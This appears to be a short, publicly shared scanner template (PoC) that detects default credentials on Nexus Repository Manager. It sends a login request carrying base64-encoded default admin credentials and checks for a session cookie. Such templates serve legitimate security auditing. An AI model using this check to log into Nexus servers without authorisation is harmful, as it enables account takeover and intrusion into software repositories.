漏洞描述
body="Nexus Repository Manager"
nexus-default-password: Nexus Default Password
PoC代码[已公开]
id: nexus-default-password
info:
name: Nexus Default Password
author: Soveless
severity: high
verified: true
description: |-
body="Nexus Repository Manager"
reference:
- https://www.tenable.com/plugins/nessus/105244
tags: default-login,nexus
created: 2023/06/24
rules:
r0:
request:
method: POST
path: /service/rapture/session
headers:
X-Nexus-UI: true
body: username=YWRtaW4%3D&password=YWRtaW4xMjM%3D
expression: response.status == 204 && response.raw_header.bcontains(b'NXSESSIONID')
expression: r0()